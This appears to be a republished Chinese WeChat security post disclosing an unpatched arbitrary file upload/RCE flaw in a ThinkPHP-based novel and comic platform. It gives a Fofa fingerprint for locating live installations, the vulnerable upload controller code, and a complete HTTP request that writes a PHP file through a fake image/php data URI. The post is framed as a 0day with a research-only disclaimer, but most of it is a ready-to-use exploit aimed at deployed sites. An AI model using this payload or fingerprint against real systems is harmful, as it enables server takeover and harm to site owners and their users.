点击上方蓝字关注我们 并设为星标
0x00 前言
源码描述:修复版掌上阅读小说源码_公众号漫画源码可以打包漫画app,掌上阅读小说源码支持公众号、代理分站支付功能完善强大的小说源码,可以对接微信公众号、APP打包。支持对接个人微信收款。
1新增签到、平台分享奖励书币、小说推广链接生成,更好的推广平台增加粘性。
2.新增可自定义中间和底部导航。
3.新增可添加章节广告增加收益.
4.可以管理公众号菜单、消息推送、自定义回复。
5.可以添加加盟商分站,可添加代理、自定义扣量。
Fofa指纹:"/Public/home/mhjs/jquery.js"
框架:ThinkPHP 3.2.3 Debug:True
0x01 漏洞分析&复现
需要普通用户登录权限(可直接注册)
位于 /Application/Home/Controller/IndexAjaxController.class.php 控制器的Upload方法通过base64传入img,size两个参数,然后再通过file_put_contents函数来将base64编码后的文件写入到Upload目录之中去.
需要注意的是 size 参数为传入的img参数的长度( 包括data:///协议本体)
/*** 公共上传图片方法*/public function Upload(){$base64_image_content = I("post.img");$image_name = I("post.name");$len = I("post.size");$baseLen = strlen($base64_image_content);if($len!=$baseLen) $this->error("上传图片不完整");if (preg_match('/^(data:s*image/(w+);base64,)/', $base64_image_content, $result)){$uploadFolder = C('UPLOADPATH').date("Ymd")."/";if(!is_dir($uploadFolder)){if(!mkdir($uploadFolder, 0755, true)){$this->error('创建文件失败');}}$type = $result[2];if(empty($image_name)){$new_file = $uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";}else{$new_file = $uploadFolder.$image_name."_".date("mdHis").".{$type}";}$img_64 = base64_decode(str_replace($result[1], '', $base64_image_content));if (file_put_contents($new_file,$img_64)){$this->success(complete_url($new_file));}}else{$this->error("图片不存在");}}
Payload:
POST /index.php?m=&c=IndexAjax&a=Upload HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveContent-Length: 78Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; uloginid=107639Host: 127.0.0.1Origin: http://127.0.0.1Pragma: no-cacheReferer: http://127.0.0.1/index.php?m=&c=IndexAjaxSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"img=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==&size=50
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转
漫画系统源码关注公众号发送 241004 获取!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):微信公众号小说漫画系统前台任意文件写入漏洞(RCE)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论